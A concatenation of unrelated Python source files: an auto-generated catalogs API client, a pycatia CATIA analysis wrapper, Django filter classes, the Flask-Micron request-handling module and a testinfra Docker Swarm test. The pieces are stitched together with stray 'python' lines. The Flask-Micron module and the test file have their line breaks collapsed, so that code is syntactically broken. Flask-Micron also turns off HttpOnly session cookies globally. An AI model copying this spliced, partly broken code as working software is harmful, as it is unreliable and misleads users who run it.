        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_assignments" % key
                )
            params[key] = val
        del params['kwargs']

        resource_path = '/catalogs/assignments'.replace('{format}', 'json')
        path_params = {}

        query_params = {}
        if 'catalog_id' in params:
            query_params['catalogID'] = params['catalog_id']
        if 'buyer_id' in params:
            query_params['buyerID'] = params['buyer_id']
        if 'page' in params:
            query_params['page'] = params['page']
        if 'page_size' in params:
            query_params['pageSize'] = params['page_size']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

        # Authentication setting
        auth_settings = ['oauth2']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='ListCatalogAssignment',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def list_product_assignments(self, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.list_product_assignments(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog.
        :param str product_id: ID of the product.
        :param int page: Page of results to return. Default: 1
        :param int page_size: Number of results to return per page.
            Default: 20, max: 100.
        :return: ListProductCatalogAssignment
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Payload-only convenience wrapper around the *_with_http_info method.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.list_product_assignments_with_http_info(**kwargs)
        else:
            (data) = self.list_product_assignments_with_http_info(**kwargs)
            return data

    def list_product_assignments_with_http_info(self, **kwargs):
        """
        Auto-generated transport method for GET /catalogs/productassignments.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.list_product_assignments_with_http_info(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog.
        :param str product_id: ID of the product.
        :param int page: Page of results to return. Default: 1
        :param int page_size: Number of results to return per page.
            Default: 20, max: 100.
        :return: ListProductCatalogAssignment
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['catalog_id', 'product_id', 'page', 'page_size']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_product_assignments" % key
                )
            params[key] = val
        del params['kwargs']

        resource_path = '/catalogs/productassignments'.replace('{format}', 'json')
        path_params = {}

        query_params = {}
        if 'catalog_id' in params:
            query_params['catalogID'] = params['catalog_id']
        if 'product_id' in params:
            query_params['productID'] = params['product_id']
        if 'page' in params:
            query_params['page'] = params['page']
        if 'page_size' in params:
            query_params['pageSize'] = params['page_size']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

        # Authentication setting
        auth_settings = ['oauth2']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='ListProductCatalogAssignment',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def patch(self, catalog_id, partial_catalog, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.patch(catalog_id, partial_catalog, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog. (required)
        :param Catalog partial_catalog: (required)
        :return: Catalog
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Payload-only convenience wrapper around the *_with_http_info method.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.patch_with_http_info(catalog_id, partial_catalog, **kwargs)
        else:
            (data) = self.patch_with_http_info(catalog_id, partial_catalog, **kwargs)
            return data

    def patch_with_http_info(self, catalog_id, partial_catalog, **kwargs):
        """
        Auto-generated transport method for PATCH /catalogs/{catalogID}.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.patch_with_http_info(catalog_id, partial_catalog, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog. (required)
        :param Catalog partial_catalog: (required)
        :return: Catalog
                 If the method is called asynchronously,
                 returns the request thread.
        :raises ValueError: if a required parameter is missing or None.
        """
        all_params = ['catalog_id', 'partial_catalog']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        # NOTE: locals() is snapshotted into a plain dict here; mutating
        # `params` below does NOT change the real local variables.
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method patch" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'catalog_id' is set
        if ('catalog_id' not in params) or (params['catalog_id'] is None):
            raise ValueError("Missing the required parameter `catalog_id` when calling `patch`")
        # verify the required parameter 'partial_catalog' is set
        if ('partial_catalog' not in params) or (params['partial_catalog'] is None):
            raise ValueError("Missing the required parameter `partial_catalog` when calling `patch`")

        resource_path = '/catalogs/{catalogID}'.replace('{format}', 'json')
        path_params = {}
        if 'catalog_id' in params:
            path_params['catalogID'] = params['catalog_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'partial_catalog' in params:
            body_params = params['partial_catalog']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

        # Authentication setting
        auth_settings = ['oauth2']

        return self.api_client.call_api(resource_path, 'PATCH',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='Catalog',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def save(self, catalog_id, catalog, **kwargs):
        """
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please define a `callback`
        function to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.save(catalog_id, catalog, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog. (required)
        :param Catalog catalog: (required)
        :return: Catalog
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Payload-only convenience wrapper around the *_with_http_info method.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.save_with_http_info(catalog_id, catalog, **kwargs)
        else:
            (data) = self.save_with_http_info(catalog_id, catalog, **kwargs)
            return data

    def save_with_http_info(self, catalog_id, catalog, **kwargs):
        """
        Auto-generated transport method for PUT /catalogs/{catalogID}.

        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please define a `callback`
        function to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.save_with_http_info(catalog_id, catalog, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str catalog_id: ID of the catalog. (required)
        :param Catalog catalog: (required)
        :return: Catalog
                 If the method is called asynchronously,
                 returns the request thread.
        :raises ValueError: if a required parameter is missing or None.
        """
        all_params = ['catalog_id', 'catalog']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method save" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'catalog_id' is set
        if ('catalog_id' not in params) or (params['catalog_id'] is None):
            raise ValueError("Missing the required parameter `catalog_id` when calling `save`")
        # verify the required parameter 'catalog' is set
        if ('catalog' not in params) or (params['catalog'] is None):
            raise ValueError("Missing the required parameter `catalog` when calling `save`")

        resource_path = '/catalogs/{catalogID}'.replace('{format}', 'json')
        path_params = {}
        if 'catalog_id' in params:
            path_params['catalogID'] = params['catalog_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'catalog' in params:
            body_params = params['catalog']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

        # Authentication setting
        auth_settings = ['oauth2']

        return self.api_client.call_api(resource_path, 'PUT',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='Catalog',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def save_assignment(self, catalog_assignment, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.save_assignment(catalog_assignment, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param CatalogAssignment catalog_assignment: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Payload-only convenience wrapper around the *_with_http_info method.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.save_assignment_with_http_info(catalog_assignment, **kwargs)
        else:
            (data) = self.save_assignment_with_http_info(catalog_assignment, **kwargs)
            return data

    def save_assignment_with_http_info(self, catalog_assignment, **kwargs):
        """
        Auto-generated transport method for POST /catalogs/assignments.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.save_assignment_with_http_info(catalog_assignment, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param CatalogAssignment catalog_assignment: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        :raises ValueError: if a required parameter is missing or None.
        """
        all_params = ['catalog_assignment']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        # NOTE: locals() is snapshotted into a plain dict here; mutating
        # `params` below does NOT change the real local variables.
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method save_assignment" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'catalog_assignment' is set
        if ('catalog_assignment' not in params) or (params['catalog_assignment'] is None):
            raise ValueError("Missing the required parameter `catalog_assignment` when calling `save_assignment`")

        resource_path = '/catalogs/assignments'.replace('{format}', 'json')
        path_params = {}

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'catalog_assignment' in params:
            body_params = params['catalog_assignment']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

        # Authentication setting
        auth_settings = ['oauth2']

        return self.api_client.call_api(resource_path, 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type=None,
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def save_product_assignment(self, product_catalog_assignment, **kwargs):
        """
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.save_product_assignment(product_catalog_assignment, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param ProductCatalogAssignment product_catalog_assignment: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Payload-only convenience wrapper around the *_with_http_info method.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.save_product_assignment_with_http_info(product_catalog_assignment, **kwargs)
        else:
            (data) = self.save_product_assignment_with_http_info(product_catalog_assignment, **kwargs)
            return data

    def save_product_assignment_with_http_info(self, product_catalog_assignment, **kwargs):
        """
        Auto-generated transport method for POST /catalogs/productassignments.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.save_product_assignment_with_http_info(product_catalog_assignment, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param ProductCatalogAssignment product_catalog_assignment: (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        :raises ValueError: if a required parameter is missing or None.
        """
        all_params = ['product_catalog_assignment']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method save_product_assignment" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'product_catalog_assignment' is set
        if ('product_catalog_assignment' not in params) or (params['product_catalog_assignment'] is None):
            raise ValueError("Missing the required parameter `product_catalog_assignment` when calling `save_product_assignment`")

        resource_path = '/catalogs/productassignments'.replace('{format}', 'json')
        path_params = {}

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'product_catalog_assignment' in params:
            body_params = params['product_catalog_assignment']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

        # Authentication setting
        auth_settings = ['oauth2']

        return self.api_client.call_api(resource_path, 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type=None,
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))
python
#!/usr/bin/python3.6
"""
Module initially auto generated using V5Automation files from CATIA V5 R28
on 2020-06-11 12:40:47.360445.

.. warning::
    The notes denoted "CAA V5 Visual Basic Help" are to be used as reference
    only. They are there as a guide as to how the visual basic / catscript
    functions work and thus help debugging in pycatia.
"""

from pycatia.system_interfaces.any_object import AnyObject
from pycatia.system_interfaces.system_service import SystemService


class Analyze(AnyObject):
    """
    Represents the analysis object associated with a product (mass, volume,
    wet area, centre of gravity, inertia matrix).

    .. note::
        :class: toggle

        CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445)

            | System.IUnknown
            |     System.IDispatch
            |         System.CATBaseUnknown
            |             System.CATBaseDispatch
            |                 System.AnyObject
            |                     Analyze
            |
            | Represents the analysis object associated with a product.
    """

    def __init__(self, com_object):
        super().__init__(com_object)
        # Keep a direct handle to the underlying COM Analyze object.
        self.analyze = com_object

    @property
    def mass(self) -> float:
        """
        Returns the product mass value.

        .. note::
            :class: toggle

            CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445)

                | o Property Mass() As double (Read Only)
                |
                |     Returns the product mass value.
                |
                |     Example:
                |         This example retrieves MassValue from
                |         the Analyze object associated with myProduct:
                |
                |          MassValue = myProduct.Analyze.Mass

        :rtype: float
        """
        return self.analyze.Mass

    @property
    def volume(self) -> float:
        """
        Returns the product volume value.

        .. note::
            :class: toggle

            CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445)

                | o Property Volume() As double (Read Only)
                |
                |     Returns the product volume value.
                |
                |     Example:
                |         This example retrieves VolumeValue from
                |         the Analyze object associated with myProduct:
                |
                |          VolumeValue = myProduct.Analyze.Volume

        :rtype: float
        """
        return self.analyze.Volume

    @property
    def wet_area(self) -> float:
        """
        Returns the product wet area (outer volume).

        .. note::
            :class: toggle

            CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445)

                | o Property WetArea() As double (Read Only)
                |
                |     Returns the product wet area (outer volume).
                |
                |     Note:
                |         This method uses mm2 instead of default Catia V5 unit.
                |
                |     Example:
                |         This example retrieves WetAreaValue from
                |         the Analyze object associated with myProduct:
                |
                |          WetAreaValue = myProduct.Analyze.WetArea

        :rtype: float
        """
        return self.analyze.WetArea

    def get_gravity_center(self):
        """
        Returns the gravity centre coordinates of the product.

        .. note::
            :class: toggle

            CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445)

                | o Sub GetGravityCenter(CATSafeArrayVariant
                |   oGravityCenterCoordinatesArray)
                |
                |     Returns the gravity center coordinates of product.
                |
                |     Parameters:
                |         Coordinates
                |             The array storing the three gravity center
                |             coordinates. This array must be previously
                |             initialized.

        :return: the three gravity-centre coordinates as returned by the VBA
            helper (presumably a (x, y, z) sequence — confirm against
            SystemService.evaluate).
        """
        # GetGravityCenter expects a pre-dimensioned VB array, which cannot be
        # created directly from python; a small VBA shim is evaluated instead.
        vba_function_name = 'get_gravity_center'
        vba_code = """
        Public Function get_gravity_center(analyze)
            Dim oGravityCenterCoordinatesArray (2)
            analyze.GetGravityCenter oGravityCenterCoordinatesArray
            get_gravity_center = oGravityCenterCoordinatesArray
        End Function
        """

        system_service = self.application.system_service
        return system_service.evaluate(vba_code, 0, vba_function_name, [self.com_object])

    def get_inertia(self):
        """
        Returns the inertia matrix array of the product.

        .. note::
            :class: toggle

            CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445)

                | o Sub GetInertia(CATSafeArrayVariant oInertiaMatrixArray)
                |
                |     Returns the inertia matrix array of product.
                |
                |     Parameters:
                |         oInertiaMatrixArray
                |             The array storing successively the three columns
                |             of inertia matrix. This array must be previously
                |             initialized.
                |
                |     The 9 components are, in order:
                |         Ixx, Ixy, Ixz, Iyx, Iyy, Iyz, Izx, Izy, Izz

        :return: tuple of the nine inertia-matrix components (row-major order
            per the VBA help above).
        """
        # GetInertia expects a pre-dimensioned VB array, which cannot be
        # created directly from python; a small VBA shim is evaluated instead.
        vba_function_name = 'get_inertia'
        vba_code = """
        Public Function get_inertia(analyze)
            Dim oInertiaMatrixArray (8)
            analyze.GetInertia oInertiaMatrixArray
            get_inertia = oInertiaMatrixArray
        End Function
        """

        system_service = self.application.system_service
        return system_service.evaluate(vba_code, 0, vba_function_name, [self.com_object])

    def __repr__(self):
        return f'Analyze(name="{self.name}")'
python
from django.db import models
from django.utils import timezone
from django.db.models import Q
from django_filters.rest_framework import *
from django_filters import filters
from django_filters.constants import EMPTY_VALUES


class Filter(FilterSet):
    """FilterSet bound to a model form's queryset.

    :param form: a bound ModelForm; its model's default queryset is used
        when no explicit ``queryset`` is supplied.
    :param request: optional request-style data passed to ``FilterSet``.
    :param queryset: optional queryset to filter instead of the default.
    """

    def __init__(self, form, request=None, queryset=None):
        queryset = form._meta.model.objects.all() if queryset is None else queryset
        super(Filter, self).__init__(request, queryset=queryset)
        self._form = form

    def filter_queryset(self, queryset):
        """
        Filter the queryset with the underlying form's `cleaned_data`. You
        must call `is_valid()` or `errors` before calling this method.

        This method should be overridden if additional filtering needs to be
        applied to the queryset before it is cached.
        """
        for name, value in self.form.cleaned_data.items():
            # BUGFIX: previously the checks were one elif-chain, so a model
            # instance skipped the `name in self.filters` test and raised
            # KeyError for form fields that have no matching filter.
            if value is None or name not in self.filters:
                continue
            if isinstance(value, models.Model):
                # Filter on the primary key rather than the instance itself.
                value = value.pk
            queryset = self.filters[name].filter(queryset, value)
            assert isinstance(queryset, models.QuerySet), \
                "Expected '%s.%s' to return a QuerySet, but got a %s instead." \
                % (type(self).__name__, name, type(queryset).__name__)
        return queryset


class QFilter(filters.CharFilter):
    """CharFilter that ORs one search value across several (field, lookup)
    pairs, e.g. ``QFilter(fields=[('name', 'icontains'), ('email', 'iexact')])``.
    """

    def __init__(self, fields, **kwargs):
        super(QFilter, self).__init__(**kwargs)
        self.fields = fields

    def filter(self, qs, value):
        if value in EMPTY_VALUES:
            return qs
        if self.distinct:
            qs = qs.distinct()
        # Build `field__lookup=value` predicates and OR them together.
        qfilter = None
        for field in self.fields:
            predicate = Q(**{"{0}__{1}".format(*field): value})
            qfilter = predicate if qfilter is None else qfilter | predicate
        qs = self.get_method(qs)(qfilter)
        return qs


class DateRangeFilter(filters.DateRangeFilter):
    """Date-range filter with a fixed set of relative choices.

    BUGFIX: 'yesterday' and 'last_7_days' previously built
    ``timezone.datetime(d.year, d.month, d.day - 1)``, which raises
    ValueError on the first day(s) of a month; timedelta arithmetic is
    used instead (``timezone`` re-exports ``datetime.timedelta``).
    """

    choices = [
        ('today', 'Today'),
        ('yesterday', 'Yesterday'),
        ('last_7_days', 'Past 7 days'),
        ('current_month', 'This month'),
        ('current_year', 'This year'),
    ]

    filters = {
        'today': lambda qs, name: qs.filter(**{
            '%s__gte' % name: timezone.now().date()
        }),
        'yesterday': lambda qs, name: qs.filter(**{
            '%s__gte' % name: timezone.now().date() - timezone.timedelta(days=1),
            '%s__lt' % name: timezone.now().date(),
        }),
        'last_7_days': lambda qs, name: qs.filter(**{
            '%s__gte' % name: timezone.now().date() - timezone.timedelta(days=6)
        }),
        'current_month': lambda qs, name: qs.filter(**{
            '%s__gte' % name: timezone.now().date().replace(day=1)
        }),
        'current_year': lambda qs, name: qs.filter(**{
            '%s__gte' % name: timezone.now().date().replace(month=1, day=1)
        }),
    }
python
# -*- coding: utf-8 -*- """ flask_micron.method =================== This module provides the functionality for wrapping functions to make them work for Flask-Micron request handling. :copyright: (c) 2016 by Maurice Makaay :license: BSD, see LICENSE for more details. """ import re import sys import traceback from functools import update_wrapper import flask from flask_micron import plugin from flask_micron.errors import MicronError from flask_micron.errors import UnhandledException from flask_micron.errors import ImplementationError class MicronMethod(object): """The MicronMethod class wraps a standard function to make it work for Flask-Micron request handling. If forms the glue between the `Flask`_ app environment and Flask-Micron components. """ def __init__(self, micron, function): """Creates a new MicronMethod object. :param Micron micron: The Micron instance that creates this MicronMethod. :param function function: The function to wrap this MicronMethod around. """ update_wrapper(self, function) self.function = function self.plugins = micron.plugins self.config = MicronMethodConfig(micron.config) def configure(self, **configuration): r"""Updates the configuration for this MicronMethod instance. :param \**configuration: Configuration options that define in what way the Micron method must behave. These configuration options can be used to override the default configuration as set for the Micron object that was used to create this MicronMethod. :returns: The MicronMethod itself, useful for fluent syntax. """ self.config.configure(**configuration) return self def __call__(self): """Executes the MicronMethod. This method implements the very core of Micron request handling. Micron lets Flask take care of web server interaction, routing, context setup, etc. Flask will eventually call this method to render the route. That is when the Micron-specific request handling kicks in. :returns: The Flask Response object to return to the client. 
""" self._enable_cookies_for_js_clients() ctx = plugin.Context() ctx.config = self.config.flattened ctx.function = self.function try: self.plugins.call_all(ctx, 'start_request') self.plugins.call_all(ctx, 'check_access') self.plugins.call_all(ctx, 'after_check_access') self.plugins.call_one(ctx, 'read_input', 'input') self.plugins.call_all(ctx, 'normalize_input') self.plugins.call_all(ctx, 'validate_input') self.plugins.call_one(ctx, 'call_function', 'output') self.plugins.call_all(ctx, 'process_output') self.plugins.call_one(ctx, 'create_response', 'response') self.plugins.call_all(ctx, 'process_response') self.plugins.call_all(ctx, 'end_request') except MicronError: (_, error, traceback_) = sys.exc_info() self._handle_error(ctx, error, traceback_) except Exception: (_, error, traceback_) = sys.exc_info() self._handle_error(ctx, UnhandledException(error), traceback_) return ctx.response def _enable_cookies_for_js_clients(self): flask.current_app.config['SESSION_COOKIE_HTTPONLY'] = False def _handle_error(self, ctx, error, traceback_): ctx.error = error ctx.output = { 'code': type(error).__name__, 'caused_by': error.caused_by, 'description': str(error), 'details': error.details, 'trace': self._create_trace(traceback_) } self.plugins.call_one(ctx, 'create_response', 'reponse') self.plugins.call_all(ctx, 'process_error') self.plugins.call_all(ctx, 'process_response') self.plugins.call_all(ctx, 'end_request') def _create_trace(self, traceback_): ctx = flask._app_ctx_stack.top debug = ctx.app.debug if ctx else False if not debug: return None tb_list = traceback.extract_tb(traceback_) formatted = traceback.format_list(tb_list) stripped = [line.strip() for line in formatted] return stripped class MicronMethodConfig(object): """This class encapsulates the configuration options that are used for executing a MicronMethod. 
    Within Flask-Micron, this configuration is performed at two levels:

    - The Micron-level configuration (defined by calling the method
      Micron.configure() on a Micron instance)
    - The MicronMethod-level configuration (defined by options that were
      used in the @micron.method() decorator)

    This class supports this multi-level configuration by making each
    MicronMethodConfig aware of its parent configuration (so basically,
    we create a linked list of configurations).

    Example (note: a lookup that resolves to None simply returns None):

        >>> level1 = MicronMethodConfig(x=False, y=True)
        >>> level2 = MicronMethodConfig(level1, x=True, y=True)
        >>> level3 = MicronMethodConfig(level2, y=None)
        >>> level1.x
        False
        >>> level2.x
        True
        >>> level3.x
        True
        >>> level2.y
        True
        >>> level3.y is None
        True
    """

    # Allowed shape for configuration option names (see _check_option_name).
    IDENTIFIER_FORMAT = re.compile('^[a-zA-Z_][a-zA-Z0-9_]*$')

    def __init__(self, parent=None, **configuration):
        r"""Creates a new MicronMethodConfig.

        :param MicronMethodConfig parent:
            The parent of this MicronMethodConfig object.
        :param \**configuration:
            Values to instantiate this config object with.
        """
        # Using the super __setattr__ is required to prevent endless loops,
        # since we implemented __setattr__/__getattr__ for this class.
        setmyattr = super(MicronMethodConfig, self).__setattr__
        setmyattr('_parent', parent)
        setmyattr('_data', {})

        self.configure(**configuration)

    def __call__(self, **configuration):
        # Calling the config object is a shorthand for configure().
        return self.configure(**configuration)

    def configure(self, **configuration):
        r"""Set configuration values for this config object.

        :param \**configuration:
            Values to update this config object with.

        :returns:
            The MicronMethodConfig itself, useful for fluent syntax.
        """
        for name, value in configuration.items():
            self.set(name, value)
        return self

    def __getattr__(self, name):
        """For making config options available as instance attributes
        of the config object.
        """
        return self.get(name)

    def __setattr__(self, name, value):
        """For making config options available as instance attributes
        of the config object.
        """
        self.set(name, value)

    def set(self, name, value):
        """Set a configuration option by name.

        :param string name: The name of the configuration option.
        :param value: The value to set it to.
        """
        self._check_option_name(name)
        self._data[name] = value

    def _check_option_name(self, name):
        # NOTE(review): the message claims lowercase-only, but the regex
        # above accepts uppercase letters as well — confirm intent.
        if not self.IDENTIFIER_FORMAT.match(name):
            raise ImplementationError(
                "Invalid configuration option name '%s' used "
                "(only lowercase letters, numbers and underscores are allowed "
                "and the name must start with a letter)" % name)

    @property
    def option_names(self):
        """Returns a set of all configuration option names that are
        currently in use in the MicronMethodConfig hierarchy.
        """
        names = set()
        parent = self
        while parent is not None:
            names.update(parent._data.keys())
            parent = parent._parent
        return names

    @property
    def flattened(self):
        """Returns a dict of all configuration options that are currently
        in use in the MicronMethodConfig hierarchy.

        :returns:
            A dict, containing all configuration options.
        """
        flattened = dict(self._data)
        parent = self._parent
        # Walk up the chain; children win over parents via setdefault.
        while parent:
            for name, value in parent._data.items():
                flattened.setdefault(name, value)
            parent = parent._parent
        return flattened

    def get(self, name):
        """Retrieve a configuration value by name.

        When this MicronMethodConfig object does not have a value for the
        requested configuration option, then the parent config will be
        consulted. When no parent config exists, a KeyError is raised.

        :param string name: The name of the configuration value to retrieve.

        :returns: The configuration value.
        """
        if name in self._data:
            return self._data[name]
        if self._parent is None:
            raise KeyError(
                "No value defined for configuration option '%s'" % name)
        return self._parent.get(name)
python
import os import testinfra.utils.ansible_runner runner = testinfra.utils.ansible_runner.AnsibleRunner(os.environ['MOLECULE_INVENTORY_FILE']) ALL_HOSTS = runner.get_hosts('all') MANAGER_HOSTS = runner.get_hosts('docker_swarm_manager') WORKER_HOSTS = runner.get_hosts('docker_swarm_worker') testinfra_hosts = ALL_HOSTS def test_docker_swarm_enabled(host): assert 'Swarm: active' in host.check_output('docker info') def test_docker_swarm_status(host): docker_info = host.check_output('docker info') hostname = host.check_output('hostname -s') if hostname in MANAGER_HOSTS: assert 'Is Manager: true' in docker_info assert 'Nodes: 4' in docker_info # the test cluster is of 4 nodes assert 'Managers: 1' in docker_info # with 1 managers elif hostname in WORKER_HOSTS: assert 'Is Manager: false' in docker_info
python
